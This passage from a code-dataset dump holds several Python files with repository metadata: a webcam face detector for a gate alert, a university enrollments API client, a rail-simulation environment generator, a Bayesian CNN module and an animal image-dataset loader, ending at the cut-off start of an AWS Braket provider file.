| repo_path | face-detect.py | face-detect.py | face-detect.py |
| repo_name | Gicehajunior/face-recognition-detection-OpenCv-Python | Gicehajunior/face-recognition-detection-OpenCv-Python | Gicehajunior/face-recognition-detection-OpenCv-Python |
| repo_head_hexsha | 6551285ce5b4532d8b6f3ad6b8e9a29564673ea9 | 6551285ce5b4532d8b6f3ad6b8e9a29564673ea9 | 6551285ce5b4532d8b6f3ad6b8e9a29564673ea9 |
| repo_licenses | ["Unlicense"] | ["Unlicense"] | ["Unlicense"] |
| count | null | null | null |
| event_min_datetime | null | null | null |
| event_max_datetime | null | null | null |

content:

```python
import cv2
import sys
import playsound

face_cascade = cv2.CascadeClassifier('cascades/haarcascade_frontalface_default.xml')

# capture video using cv2
video_capture = cv2.VideoCapture(0)

while True:
    # capture frame by frame, i.e, one by one
    ret, frame = video_capture.read()
    gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)

    # for each face on the projected on the frame
    faces = face_cascade.detectMultiScale(
        gray,
        scaleFactor = 1.1,
        minNeighbors = 5,
        # minSize(35, 35)
    )

    # loop through the video faces for detection
    for (x, y, w, h) in faces:
        point1 = x+w
        point2 = y+h
        frame_color = (50, 50, 200)
        rectangleBox = cv2.rectangle(frame, (x, y), (point1, point2), frame_color, 2)
        cv2.imshow('video', frame)

        if faces.any():
            playsound.playsound('openDoorAlert.mp3', True)
            if len(faces) > 1:
                print("There are " + str(len(faces)) + " peoples at the gate")
            else:
                print("There is " + str(len(faces)) + " person at the gate")
        else:
            pass

    if cv2.waitKey(1) & 0xFF == ord('q'):
        sys.exit()
```

Quality signals (`avg_line_length` through `qsc_codepython_frac_lines_print_quality_signal`, in schema order): 28.25 | 85 | 0.563154 | 153 | 1,243 | 4.51634 | 0.522876 | 0.034732 | 0.031838 | 0.037627 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.040719 | 0.328238 | 1,243 | 43 | 86 | 28.906977 | 0.786826 | 0.134352 | 0 | 0.068966 | 0 | 0 | 0.116822 | 0.041122 | 0 | 0 | 0.003738 | 0 | 0 | 1 | 0 | false | 0.034483 | 0.103448 | 0 | 0.103448 | 0.068966

Raw `qsc_*` counterparts: all 0 (null for `qsc_code_frac_words_unique` and `qsc_code_frac_lines_string_concat`); `effective`: 1; `hits`: 0.
| hexsha | size | ext | lang |
|---|---|---|---|
| fe27fecf1f48f5d4699cad091ca66149a513fe9b | 7,938 | py | Python |

| field | max_stars | max_issues | max_forks |
|---|---|---|---|
| repo_path | sis/enrollments.py | sis/enrollments.py | sis/enrollments.py |
| repo_name | ryanlovett/sis-cli | ryanlovett/sis-cli | ryanlovett/sis-cli |
| repo_head_hexsha | 5efe5b9344b547c3f1365ef63a0ad33ec013fcca | 5efe5b9344b547c3f1365ef63a0ad33ec013fcca | 5efe5b9344b547c3f1365ef63a0ad33ec013fcca |
| repo_licenses | ["Apache-2.0"] | ["Apache-2.0"] | ["Apache-2.0"] |
| count | null | null | null |
| event_min_datetime | null | null | null |
| event_max_datetime | null | null | null |

content:
```python
# vim:set et sw=4 ts=4:
import logging
import sys
import jmespath
from . import sis, classes
# logging
logging.basicConfig(stream=sys.stdout, level=logging.WARNING)
logger = logging.getLogger(__name__)
# SIS endpoint
enrollments_uri = "https://apis.berkeley.edu/sis/v2/enrollments"
# apparently some courses have LAB without LEC (?)
section_codes = ['LEC', 'SES', 'WBL']
async def get_student_enrollments(app_id, app_key, identifier, term_id,
id_type='campus-uid', enrolled_only='true', primary_only='true',
course_attr='course-id'):
'''Gets a students enrollments.'''
uri = enrollments_uri + f"/students/{identifier}"
headers = {
"Accept": "application/json",
"app_id": app_id,
"app_key": app_key
}
params = {
"page-number": 1,
"page-size": 100, # maximum
"id-type": id_type,
"term-id": term_id,
"enrolled-only": enrolled_only,
"primary-only": primary_only,
}
enrollments = await sis.get_items(uri, params, headers, 'studentEnrollments')
logger.debug(f"enrollments: {enrollments}")
if course_attr == 'course-id':
flt = '[].classSection.class.course.identifiers[?type == `cs-course-id`].id[]'
elif course_attr == 'display-name':
flt = '[].classSection.class.course.displayName'
return jmespath.search(flt, enrollments)
async def get_section_enrollments(app_id, app_key, term_id, section_id):
'''Gets a course section's enrollments.'''
uri = enrollments_uri + f"/terms/{term_id}/classes/sections/{section_id}"
headers = {
"Accept": "application/json",
"app_id": app_id,
"app_key": app_key
}
params = {
"page-number": 1,
"page-size": 100, # maximum
}
enrollments = await sis.get_items(uri, params, headers, 'classSectionEnrollments')
logger.info(f"{section_id}: {len(enrollments)}")
return enrollments
def section_id(section):
'''Return a section's course ID, e.g. "15807".'''
return section['id']
def section_subject_area(section):
'''Return a section's subject area, e.g. "STAT".'''
return jmespath.search('class.course.subjectArea.code', section)
def section_catalog_number(section):
'''Return a section's formatted catalog number, e.g. "215B".'''
return jmespath.search('class.course.catalogNumber.formatted', section)
def section_display_name(section):
'''Return a section's displayName, e.g. "STAT 215B".'''
return jmespath.search('class.course.displayName', section)
def section_is_primary(section):
'''Return a section's primary status.'''
return jmespath.search('association.primary', section)
def enrollment_campus_uid(enrollment):
'''Return an enrollent's campus UID.'''
expr = "student.identifiers[?disclose && type=='campus-uid'].id | [0]"
return jmespath.search(expr, enrollment)
def enrollment_campus_email(enrollment):
'''Return an enrollment's campus email if found, otherwise
return any other email.'''
expr = "student.emails[?type.code=='CAMP'].emailAddress | [0]"
email = jmespath.search(expr, enrollment)
if email: return email
expr = "student.emails[?type.code=='OTHR'].emailAddress | [0]"
return jmespath.search(expr, enrollment)
def get_enrollment_uids(enrollments):
'''Given an SIS enrollment, return the student's campus UID.'''
return list(map(lambda x: enrollment_campus_uid(x), enrollments))
def get_enrollment_emails(enrollments):
'''Given an SIS enrollment, return the student's campus email.'''
return list(map(lambda x: enrollment_campus_email(x), enrollments))
def enrollment_status(enrollment):
'''Return an enrollment's status, e.g. 'E', 'W', or 'D'.'''
return jmespath.search('enrollmentStatus.status.code', enrollment)
def filter_enrollment_status(enrollments, status):
return list(filter(lambda x: enrollment_status(x) == status, enrollments))
def status_code(constituents):
return {'enrolled':'E', 'waitlisted':'W', 'dropped':'D'}[constituents]
async def get_students(term_id, class_number, constituents, credentials, exact, identifier='campus-uid'):
'''Given a term and class section number, return the student ids.'''
if exact:
# get all enrollments for this section
enrollments = await get_section_enrollments(
credentials['enrollments_id'], credentials['enrollments_key'],
term_id, class_number
)
else:
# get the data for the specified section
section = await classes.get_sections_by_id(
credentials['classes_id'], credentials['classes_key'],
term_id, class_number, include_secondary='true'
)
# extract the subject area and catalog number, e.g. STAT C8
subject_area = section_subject_area(section)
catalog_number = section_catalog_number(section)
logger.info(f"{subject_area} {catalog_number}")
# get enrollments in all matching sections
enrollments = await get_enrollments(
credentials['enrollments_id'], credentials['enrollments_key'],
term_id, subject_area, catalog_number
)
if constituents == 'students':
constituent_enrollments = enrollments
else:
# filter for those enrollments with a specific status code
constituent_enrollments = filter_enrollment_status(
enrollments, status_code(constituents))
# function to extract an enrollment attribute
if identifier == 'campus-uid':
enrollment_attr_fn = enrollment_campus_uid
else:
enrollment_attr_fn = enrollment_campus_email
logger.debug(f"constituent_enrollments: {constituent_enrollments}")
# we convert to a set to collapse overlapping enrollments between
# lectures and labs (if not exact)
return set(map(lambda x: enrollment_attr_fn(x), constituent_enrollments))
def filter_lectures(sections, relevant_codes=section_codes):
'''
Given a list of SIS sections:
[{'code': '32227', 'description': '2019 Spring ASTRON 128 001 LAB 001'}]
return only the section codes which are lectures.
'''
codes = []
for section in sections:
if 'description' not in section: continue
desc_words = set(section['description'].split())
if len(set(desc_words) & set(relevant_codes)) > 0:
codes.append(section['code'])
return codes
async def get_lecture_section_ids(app_id, app_key, term_id, subject_area, catalog_number=None):
'''
Given a term, subject, and course number, return the lecture section ids.
We only care about the lecture enrollments since they contain a superset
of the enrollments of all other section types (lab, dis).
'''
uri = enrollments_uri + f'/terms/{term_id}/classes/sections/descriptors'
headers = {
"Accept": "application/json",
"app_id": app_id,
"app_key": app_key
}
params = {
'page-number': 1,
"subject-area-code": subject_area
}
if catalog_number:
params["catalog-number"] = catalog_number
# Retrieve the sections associated with the course which includes
# both lecture and sections.
sections = await sis.get_items(uri, params, headers, 'fieldValues')
return filter_lectures(sections)
async def get_enrollments(app_id, app_key, term_id, subject_area, catalog_number):
'''Gets a course's enrollments from the SIS.'''
logger.info(f"get_enrollments: {subject_area} {catalog_number}")
# get the lectures
lecture_codes = await get_lecture_section_ids(app_id, app_key, term_id,
subject_area, catalog_number)
# get the enrollments in each lecture
enrollments = []
for section_id in lecture_codes:
enrollments += await get_section_enrollments(app_id, app_key, term_id, section_id)
logger.info(f'enrollments: {len(enrollments)}')
return enrollments
```

Quality signals (`avg_line_length` through `qsc_codepython_frac_lines_print_quality_signal`, in schema order): 37.620853 | 105 | 0.68317 | 984 | 7,938 | 5.340447 | 0.208333 | 0.015985 | 0.018268 | 0.018839 | 0.341009 | 0.24529 | 0.213701 | 0.172788 | 0.156422 | 0.114558 | 0 | 0.00725 | 0.20068 | 7,938 | 210 | 106 | 37.8 | 0.820961 | 0.163769 | 0 | 0.205882 | 0 | 0 | 0.210957 | 0.087163 | 0 | 0 | 0 | 0 | 0 | 1 | 0.095588 | false | 0 | 0.029412 | 0.014706 | 0.257353 | 0

Raw `qsc_*` counterparts: all 0 (null for `qsc_code_frac_words_unique` and `qsc_code_frac_lines_string_concat`); `effective`: 1; `hits`: 0.
| hexsha | size | ext | lang |
|---|---|---|---|
| fe292b4982f3dd8af18a6b88ccaadbbba6d158ef | 8,012 | py | Python |

| field | max_stars | max_issues | max_forks |
|---|---|---|---|
| repo_path | imitation_learning/generate_demonstrations/gen_envs.py | imitation_learning/generate_demonstrations/gen_envs.py | imitation_learning/generate_demonstrations/gen_envs.py |
| repo_name | HaiDangDang/2020-flatland | HaiDangDang/2020-flatland | HaiDangDang/2020-flatland |
| repo_head_hexsha | abbf2f7f62fabf6da0937f80c2181f1c457ce24a | abbf2f7f62fabf6da0937f80c2181f1c457ce24a | abbf2f7f62fabf6da0937f80c2181f1c457ce24a |
| repo_licenses | ["MIT"] | ["MIT"] | ["MIT"] |
| count | 1 | null | null |
| event_min_datetime | 2021-02-21T02:54:35.000Z | null | null |
| event_max_datetime | 2021-02-21T02:54:35.000Z | null | null |

content:
```python
from flatland.envs.agent_utils import RailAgentStatus
from flatland.envs.malfunction_generators import malfunction_from_params, MalfunctionParameters
from flatland.envs.observations import GlobalObsForRailEnv
from flatland.envs.rail_env import RailEnv
from flatland.envs.rail_generators import sparse_rail_generator
from flatland.envs.schedule_generators import sparse_schedule_generator
from flatland.utils.rendertools import RenderTool
import random
import sys
import os
import time
import msgpack
import json
from PIL import Image
import argparse as ap
def RandomTestParams(tid):
seed = tid * 19997 + 997
random.seed(seed)
width = 50 + random.randint(0, 100)
height = 50 + random.randint(0, 100)
nr_cities = 4 + random.randint(0, (width + height) // 10)
nr_trains = min(nr_cities * 20, 100 + random.randint(0, 100))
max_rails_between_cities = 2
max_rails_in_cities = 3 + random.randint(0, 5)
malfunction_rate = 30 + random.randint(0, 100)
malfunction_min_duration = 3 + random.randint(0, 7)
malfunction_max_duration = 20 + random.randint(0, 80)
return (
seed, width, height,
nr_trains, nr_cities,
max_rails_between_cities, max_rails_in_cities,
malfunction_rate, malfunction_min_duration, malfunction_max_duration
)
def RandomTestParams_small(tid):
seed = tid * 19997 + 997
random.seed(seed)
nSize = random.randint(0,5)
width = 20 + nSize * 5
height = 20 + nSize * 5
nr_cities = 2 + nSize // 2 + random.randint(0,2)
nr_trains = min(nr_cities * 5, 5 + random.randint(0,5)) #, 10 + random.randint(0, 10))
max_rails_between_cities = 2
max_rails_in_cities = 3 + random.randint(0, nSize)
malfunction_rate = 30 + random.randint(0, 100)
malfunction_min_duration = 3 + random.randint(0, 7)
malfunction_max_duration = 20 + random.randint(0, 80)
return (
seed, width, height,
nr_trains, nr_cities,
max_rails_between_cities, max_rails_in_cities,
malfunction_rate, malfunction_min_duration, malfunction_max_duration
)
def ShouldRunTest(tid):
return tid >= 7
#return tid >= 3
return True
def create_test_env(fnParams, nTest, sDir):
(seed, width, height,
nr_trains, nr_cities,
max_rails_between_cities, max_rails_in_cities,
malfunction_rate, malfunction_min_duration, malfunction_max_duration) = fnParams(nTest)
#if not ShouldRunTest(test_id):
# continue
rail_generator = sparse_rail_generator(
max_num_cities=nr_cities,
seed=seed,
grid_mode=False,
max_rails_between_cities=max_rails_between_cities,
max_rails_in_city=max_rails_in_cities,
)
#stochastic_data = {'malfunction_rate': malfunction_rate,
# 'min_duration': malfunction_min_duration,
# 'max_duration': malfunction_max_duration
# }
stochastic_data = MalfunctionParameters(malfunction_rate=malfunction_rate,
min_duration=malfunction_min_duration,
max_duration=malfunction_max_duration
)
observation_builder = GlobalObsForRailEnv()
DEFAULT_SPEED_RATIO_MAP = {
1.: 0.25,
1. / 2.: 0.25,
1. / 3.: 0.25,
1. / 4.: 0.25}
schedule_generator = sparse_schedule_generator(DEFAULT_SPEED_RATIO_MAP)
for iAttempt in range(5):
try:
env = RailEnv(
width=width,
height=height,
rail_generator=rail_generator,
schedule_generator=schedule_generator,
number_of_agents=nr_trains,
malfunction_generator_and_process_data=malfunction_from_params(stochastic_data),
obs_builder_object=observation_builder,
remove_agents_at_target=True
)
obs = env.reset(random_seed = seed)
break
except ValueError as oErr:
print("Error:", oErr)
width += 5
height += 5
print("Try again with larger env: (w,h):", width, height)
if not os.path.exists(sDir):
os.makedirs(sDir)
sfName = "{}/Level_{}.mpk".format(sDir, nTest)
if os.path.exists(sfName):
os.remove(sfName)
env.save(sfName)
sys.stdout.write(".")
sys.stdout.flush()
return env
#env = create_test_env(RandomTestParams_small, 0, "train-envs-small/Test_0")
def createEnvSet(nStart, nEnd, sDir, bSmall=True):
#print("Generate small envs in train-envs-small:")
print(f"Generate envs (small={bSmall}) in dir {sDir}:")
sDirImages = "train-envs-small/images/"
if not os.path.exists(sDirImages):
os.makedirs(sDirImages)
for test_id in range(nStart, nEnd, 1):
env = create_test_env(RandomTestParams_small, test_id, sDir)
oRender = RenderTool(env, gl="PILSVG")
#oRender.env = env
#oRender.set_new_rail()
oRender.render_env()
g2img = oRender.get_image()
imgPIL = Image.fromarray(g2img)
#imgPIL.show()
imgPIL.save(sDirImages + "Level_{}.png".format(test_id))
# print("Generate large envs in train-envs-1000:")
# for test_id in range(100):
# create_test_env(RandomTestParams, test_id, "train-envs-1000/Test_0")
def merge(sfEpisode, sfEnv, sfEnvOut, bJson=False):
if bJson:
with open(sfEpisode, "rb") as fEp:
oActions = json.load(fEp)
oEp = {"actions":oActions}
print("json oEp:", type(oEp), list(oEp.keys()))
else:
with open(sfEpisode, "rb") as fEp:
oEp = msgpack.load(fEp)
print("oEp:", type(oEp), list(oEp.keys()))
with open(sfEnv, "rb") as fEnv:
oEnv = msgpack.load(fEnv)
print("oEnv:", type(oEnv), list(oEnv.keys()))
# merge dicts
oEnv2 = {**oEp, **oEnv}
print("Merged keys:", list(oEnv2.keys()))
with open(sfEnvOut, "wb") as fEnv:
msgpack.dump(oEnv2, fEnv)
def printKeys1(sfEnv):
with open(sfEnv, "rb") as fEnv:
oEnv = msgpack.load(fEnv, encoding="utf-8")
print(sfEnv, "keys:", list(oEnv.keys()))
for sKey in oEnv.keys():
print("key", sKey, len(oEnv[sKey]))
if sKey == "shape":
print("shape: ", oEnv[sKey] )
def printKeys(sfEnvs):
try:
for sfEnv in sfEnvs:
printKeys1(sfEnv)
except:
# assume single env
printKeys1(sfEnvs)
def main2():
parser = ap.ArgumentParser(description='Generate envs, merge episodes into env files.')
parser.add_argument("-c", '--createEnvs', type=int, nargs=2, action="append",
metavar=("nStart", "nEnd"),
help='merge episode into env')
parser.add_argument("-d", "--outDir", type=str, nargs=1, default="./test-envs-tmp")
parser.add_argument("-m", '--merge', type=str, nargs=3, action="append",
metavar=("episode", "env", "output_env"),
help='merge episode into env')
parser.add_argument("-j", '--mergejson', type=str, nargs=3, action="append",
metavar=("json", "env", "output_env"),
help='merge json actions into env, with key actions')
parser.add_argument('-k', "--keys", type=str, action='append', nargs="+",
help='print the keys in a file')
args=parser.parse_args()
print(args)
if args.merge:
print("merge:", args.merge)
merge(*args.merge[0])
if args.mergejson:
print("merge json:", args.mergejson)
merge(*args.mergejson[0], bJson=True)
if args.keys:
print("keys:", args.keys)
printKeys(args.keys[0])
if args.outDir:
print("outDir", args.outDir)
if args.createEnvs:
print("create Envs - ", *args.createEnvs[0])
createEnvSet(*args.createEnvs[0], sDir=args.outDir)
if __name__=="__main__":
main2()
```

Quality signals (`avg_line_length` through `qsc_codepython_frac_lines_print_quality_signal`, in schema order): 29.240876 | 96 | 0.623689 | 982 | 8,012 | 4.898167 | 0.226069 | 0.043243 | 0.04657 | 0.030561 | 0.33264 | 0.296258 | 0.259044 | 0.245738 | 0.208108 | 0.208108 | 0 | 0.026302 | 0.259735 | 8,012 | 273 | 97 | 29.347985 | 0.784691 | 0.079256 | 0 | 0.176796 | 0 | 0 | 0.076505 | 0.003261 | 0 | 0 | 0 | 0 | 0 | 1 | 0.049724 | false | 0 | 0.082873 | 0 | 0.160221 | 0.121547

Raw `qsc_*` counterparts: all 0 (null for `qsc_code_frac_words_unique` and `qsc_code_frac_lines_string_concat`); `effective`: 1; `hits`: 0.
| hexsha | size | ext | lang |
|---|---|---|---|
| fe2e74a698807b4b6d0cf881031198f5da548dd4 | 1,891 | py | Python |

| field | max_stars | max_issues | max_forks |
|---|---|---|---|
| repo_path | Image Recognition/utils/BayesianModels/Bayesian3Conv3FC.py | utils/BayesianModels/Bayesian3Conv3FC.py | utils/BayesianModels/Bayesian3Conv3FC.py |
| repo_name | AlanMorningLight/PyTorch-BayesianCNN | SulemanKhurram/ThesisExperiments | SulemanKhurram/ThesisExperiments |
| repo_head_hexsha | 5de7133f09dd10135bf605efbdd26c18f2a4df13 | 4fdf7b6558c87a096dcdc374c35085ac946d3a58 | 4fdf7b6558c87a096dcdc374c35085ac946d3a58 |
| repo_licenses | ["MIT"] | ["MIT"] | ["MIT"] |
| count | 1 | null | null |
| event_min_datetime | 2020-02-10T12:58:25.000Z | null | null |
| event_max_datetime | 2020-02-10T12:58:25.000Z | null | null |

content:

```python
import torch.nn as nn
from utils.BBBlayers import BBBConv2d, BBBLinearFactorial, FlattenLayer


class BBB3Conv3FC(nn.Module):
    """
    Simple Neural Network having 3 Convolution
    and 3 FC layers with Bayesian layers.
    """
    def __init__(self, outputs, inputs):
        super(BBB3Conv3FC, self).__init__()
        self.conv1 = BBBConv2d(inputs, 32, 5, stride=1, padding=2)
        self.soft1 = nn.Softplus()
        self.pool1 = nn.MaxPool2d(kernel_size=3, stride=2)

        self.conv2 = BBBConv2d(32, 64, 5, stride=1, padding=2)
        self.soft2 = nn.Softplus()
        self.pool2 = nn.MaxPool2d(kernel_size=3, stride=2)

        self.conv3 = BBBConv2d(64, 128, 5, stride=1, padding=1)
        self.soft3 = nn.Softplus()
        self.pool3 = nn.MaxPool2d(kernel_size=3, stride=2)

        self.flatten = FlattenLayer(2 * 2 * 128)
        self.fc1 = BBBLinearFactorial(2 * 2 * 128, 1000)
        self.soft5 = nn.Softplus()

        self.fc2 = BBBLinearFactorial(1000, 1000)
        self.soft6 = nn.Softplus()

        self.fc3 = BBBLinearFactorial(1000, outputs)

        layers = [self.conv1, self.soft1, self.pool1, self.conv2, self.soft2, self.pool2,
                  self.conv3, self.soft3, self.pool3, self.flatten, self.fc1, self.soft5,
                  self.fc2, self.soft6, self.fc3]

        self.layers = nn.ModuleList(layers)

    def probforward(self, x):
        'Forward pass with Bayesian weights'
        kl = 0
        for layer in self.layers:
            if hasattr(layer, 'convprobforward') and callable(layer.convprobforward):
                x, _kl, = layer.convprobforward(x)
                kl += _kl
            elif hasattr(layer, 'fcprobforward') and callable(layer.fcprobforward):
                x, _kl, = layer.fcprobforward(x)
                kl += _kl
            else:
                x = layer(x)
        logits = x
        return logits, kl
```

Quality signals (`avg_line_length` through `qsc_codepython_frac_lines_print_quality_signal`, in schema order): 35.679245 | 89 | 0.599683 | 229 | 1,891 | 4.886463 | 0.340611 | 0.022341 | 0.062556 | 0.040214 | 0.124218 | 0.124218 | 0.088472 | 0.088472 | 0 | 0 | 0 | 0.069733 | 0.28715 | 1,891 | 53 | 90 | 35.679245 | 0.760386 | 0.060814 | 0 | 0.052632 | 0 | 0 | 0.034618 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052632 | false | 0.026316 | 0.052632 | 0 | 0.157895 | 0

Raw `qsc_*` counterparts: all 0 (null for `qsc_code_frac_words_unique` and `qsc_code_frac_lines_string_concat`); `effective`: 1; `hits`: 0.
| hexsha | size | ext | lang |
|---|---|---|---|
| fe2fc61a568a0e2538b7b1f99349a5186a485475 | 8,657 | py | Python |

| field | max_stars | max_issues | max_forks |
|---|---|---|---|
| repo_path | custom_scripts/load_animals.py | custom_scripts/load_animals.py | custom_scripts/load_animals.py |
| repo_name | nphilou/influence-release | nphilou/influence-release | nphilou/influence-release |
| repo_head_hexsha | bcf3603705b6ff172bcb62123aef0248afa77a05 | bcf3603705b6ff172bcb62123aef0248afa77a05 | bcf3603705b6ff172bcb62123aef0248afa77a05 |
| repo_licenses | ["MIT"] | ["MIT"] | ["MIT"] |
| count | null | null | null |
| event_min_datetime | null | null | null |
| event_max_datetime | null | null | null |

content:
```python
import os
from tensorflow.contrib.learn.python.learn.datasets import base
import numpy as np
import IPython
from subprocess import call
from keras.preprocessing import image
from influence.dataset import DataSet
from influence.inception_v3 import preprocess_input
BASE_DIR = 'data' # TODO: change
def fill(X, Y, idx, label, img_path, img_side):
img = image.load_img(img_path, target_size=(img_side, img_side))
x = image.img_to_array(img)
X[idx, ...] = x
Y[idx] = label
def extract_and_rename_animals():
class_maps = [
('dog', 'n02084071'),
('cat', 'n02121808'),
('bird', 'n01503061'),
('fish', 'n02512053'),
('horse', 'n02374451'),
('monkey', 'n02484322'),
('zebra', 'n02391049'),
('panda', 'n02510455'),
('lemur', 'n02496913'),
('wombat', 'n01883070'),
]
for class_string, class_id in class_maps:
class_dir = os.path.join(BASE_DIR, class_string)
print(class_dir)
call('mkdir %s' % class_dir, shell=True)
call('tar -xf %s.tar -C %s' % (os.path.join(BASE_DIR, class_id), class_dir), shell=True)
for filename in os.listdir(class_dir):
file_idx = filename.split('_')[1].split('.')[0]
src_filename = os.path.join(class_dir, filename)
dst_filename = os.path.join(class_dir, '%s_%s.JPEG' % (class_string, file_idx))
os.rename(src_filename, dst_filename)
def load_animals(num_train_ex_per_class=300,
num_test_ex_per_class=100,
num_valid_ex_per_class=0,
classes=None,
):
num_channels = 3
img_side = 299
if num_valid_ex_per_class == 0:
valid_str = ''
else:
valid_str = '_valid-%s' % num_valid_examples
if classes is None:
classes = ['dog', 'cat', 'bird', 'fish', 'horse', 'monkey', 'zebra', 'panda', 'lemur', 'wombat']
data_filename = os.path.join(BASE_DIR, 'dataset_train-%s_test-%s%s.npz' % (num_train_ex_per_class, num_test_ex_per_class, valid_str))
else:
data_filename = os.path.join(BASE_DIR, 'dataset_%s_train-%s_test-%s%s.npz' % ('-'.join(classes), num_train_ex_per_class, num_test_ex_per_class, valid_str))
num_classes = len(classes)
num_train_examples = num_train_ex_per_class * num_classes
num_test_examples = num_test_ex_per_class * num_classes
num_valid_examples = num_valid_ex_per_class * num_classes
if os.path.exists(data_filename):
print('Loading animals from disk...')
f = np.load(data_filename)
X_train = f['X_train']
X_test = f['X_test']
Y_train = f['Y_train']
Y_test = f['Y_test']
if 'X_valid' in f:
X_valid = f['X_valid']
else:
X_valid = None
if 'Y_valid' in f:
Y_valid = f['Y_valid']
else:
Y_valid = None
else:
print('Reading animals from raw images...')
X_train = np.zeros([num_train_examples, img_side, img_side, num_channels])
X_test = np.zeros([num_test_examples, img_side, img_side, num_channels])
# X_valid = np.zeros([num_valid_examples, img_side, img_side, num_channels])
X_valid = None
Y_train = np.zeros([num_train_examples])
Y_test = np.zeros([num_test_examples])
# Y_valid = np.zeros([num_valid_examples])
Y_valid = None
for class_idx, class_string in enumerate(classes):
print('class: %s' % class_string)
# For some reason, a lot of numbers are skipped.
i = 0
num_filled = 0
while num_filled < num_train_ex_per_class:
img_path = os.path.join(BASE_DIR, '%s/%s_%s.JPEG' % (class_string, class_string, i))
print(img_path)
if os.path.exists(img_path):
fill(X_train, Y_train, num_filled + (num_train_ex_per_class * class_idx), class_idx, img_path, img_side)
num_filled += 1
print(num_filled)
i += 1
num_filled = 0
while num_filled < num_test_ex_per_class:
img_path = os.path.join(BASE_DIR, '%s/%s_%s.JPEG' % (class_string, class_string, i))
if os.path.exists(img_path):
fill(X_test, Y_test, num_filled + (num_test_ex_per_class * class_idx), class_idx, img_path, img_side)
num_filled += 1
print(num_filled)
i += 1
num_filled = 0
while num_filled < num_valid_ex_per_class:
img_path = os.path.join(BASE_DIR, '%s/%s_%s.JPEG' % (class_string, class_string, i))
if os.path.exists(img_path):
fill(X_valid, Y_valid, num_filled + (num_valid_ex_per_class * class_idx), class_idx, img_path, img_side)
num_filled += 1
print(num_filled)
i += 1
X_train = preprocess_input(X_train)
X_test = preprocess_input(X_test)
X_valid = preprocess_input(X_valid)
np.random.seed(0)
permutation_idx = np.arange(num_train_examples)
np.random.shuffle(permutation_idx)
X_train = X_train[permutation_idx, :]
Y_train = Y_train[permutation_idx]
permutation_idx = np.arange(num_test_examples)
np.random.shuffle(permutation_idx)
X_test = X_test[permutation_idx, :]
Y_test = Y_test[permutation_idx]
permutation_idx = np.arange(num_valid_examples)
np.random.shuffle(permutation_idx)
X_valid = X_valid[permutation_idx, :]
Y_valid = Y_valid[permutation_idx]
np.savez_compressed(data_filename, X_train=X_train, Y_train=Y_train, X_test=X_test, Y_test=Y_test, X_valid=X_valid, Y_valid=Y_valid)
train = DataSet(X_train, Y_train)
if (X_valid is not None) and (Y_valid is not None):
# validation = DataSet(X_valid, Y_valid)
validation = None
else:
validation = None
test = DataSet(X_test, Y_test)
return base.Datasets(train=train, validation=validation, test=test)
def load_koda():
num_channels = 3
img_side = 299
data_filename = os.path.join(BASE_DIR, 'dataset_koda.npz')
if os.path.exists(data_filename):
print('Loading Koda from disk...')
f = np.load(data_filename)
X = f['X']
Y = f['Y']
else:
# Returns all class 0
print('Reading Koda from raw images...')
image_files = [image_file for image_file in os.listdir(os.path.join(BASE_DIR, 'koda')) if (image_file.endswith('.jpg'))]
# Hack to get the image files in the right order
# image_files = [image_file for image_file in os.listdir(os.path.join(BASE_DIR, 'koda')) if (image_file.endswith('.jpg') and not image_file.startswith('124'))]
# image_files += [image_file for image_file in os.listdir(os.path.join(BASE_DIR, 'koda')) if (image_file.endswith('.jpg') and image_file.startswith('124'))]
num_examples = len(image_files)
X = np.zeros([num_examples, img_side, img_side, num_channels])
Y = np.zeros([num_examples])
class_idx = 0
for counter, image_file in enumerate(image_files):
img_path = os.path.join(BASE_DIR, 'koda', image_file)
fill(X, Y, counter, class_idx, img_path, img_side)
X = preprocess_input(X)
np.savez(data_filename, X=X, Y=Y)
return X, Y
def load_dogfish_with_koda():
classes = ['dog', 'fish']
X_test, Y_test = load_koda()
data_sets = load_animals(num_train_ex_per_class=900,
num_test_ex_per_class=300,
num_valid_ex_per_class=0,
classes=classes)
train = data_sets.train
validation = data_sets.validation
test = DataSet(X_test, Y_test)
return base.Datasets(train=train, validation=validation, test=test)
def load_dogfish_with_orig_and_koda():
classes = ['dog', 'fish']
X_test, Y_test = load_koda()
X_test = np.reshape(X_test, (X_test.shape[0], -1))
data_sets = load_animals(num_train_ex_per_class=900,
num_test_ex_per_class=300,
num_valid_ex_per_class=0,
classes=classes)
train = data_sets.train
validation = data_sets.validation
test = DataSet(
np.concatenate((data_sets.test.x, X_test), axis=0),
np.concatenate((data_sets.test.labels, Y_test), axis=0))
return base.Datasets(train=train, validation=validation, test=test)
```

Quality signals (`avg_line_length` through `qsc_codepython_frac_lines_print_quality_signal`, in schema order): 35.479508 | 167 | 0.611644 | 1,210 | 8,657 | 4.047934 | 0.135537 | 0.023479 | 0.046958 | 0.0343 | 0.561862 | 0.53185 | 0.449367 | 0.368722 | 0.307472 | 0.280114 | 0 | 0.021666 | 0.274922 | 8,657 | 243 | 168 | 35.625514 | 0.758643 | 0.068615 | 0 | 0.357542 | 0 | 0 | 0.069921 | 0.007824 | 0 | 0 | 0 | 0.004115 | 0 | 1 | 0.03352 | false | 0 | 0.044693 | 0 | 0.100559 | 0.055866

Raw `qsc_*` counterparts: all 0 (null for `qsc_code_frac_words_unique` and `qsc_code_frac_lines_string_concat`); `effective`: 1; `hits`: 0.
| hexsha | size | ext | lang |
|---|---|---|---|
| fe2fd1a403e44db33fca9bd236a441a4df247ba1 | 13,000 | py | Python |

| field | max_stars | max_issues | max_forks |
|---|---|---|---|
| repo_path | src/qiskit_aws_braket_provider/awsbackend.py | src/qiskit_aws_braket_provider/awsbackend.py | src/qiskit_aws_braket_provider/awsbackend.py |
| repo_name | carstenblank/qiskit-aws-braket-provider | carstenblank/qiskit-aws-braket-provider | carstenblank/qiskit-aws-braket-provider |
| repo_head_hexsha | 539f0c75c2ccf1f6e5e981b92ea74f497fcba237 | 539f0c75c2ccf1f6e5e981b92ea74f497fcba237 | 539f0c75c2ccf1f6e5e981b92ea74f497fcba237 |
| repo_licenses | ["Apache-2.0"] | ["Apache-2.0"] | ["Apache-2.0"] |
| count | 7 | 4 | 1 |
| event_min_datetime | 2020-09-25T17:16:54.000Z | 2020-09-21T19:33:39.000Z | 2020-09-21T19:32:16.000Z |
| event_max_datetime | 2021-05-20T10:42:52.000Z | 2020-09-22T12:21:11.000Z | 2020-09-21T19:32:16.000Z |

content:
```python
# Copyright 2020 Carsten Blank
#
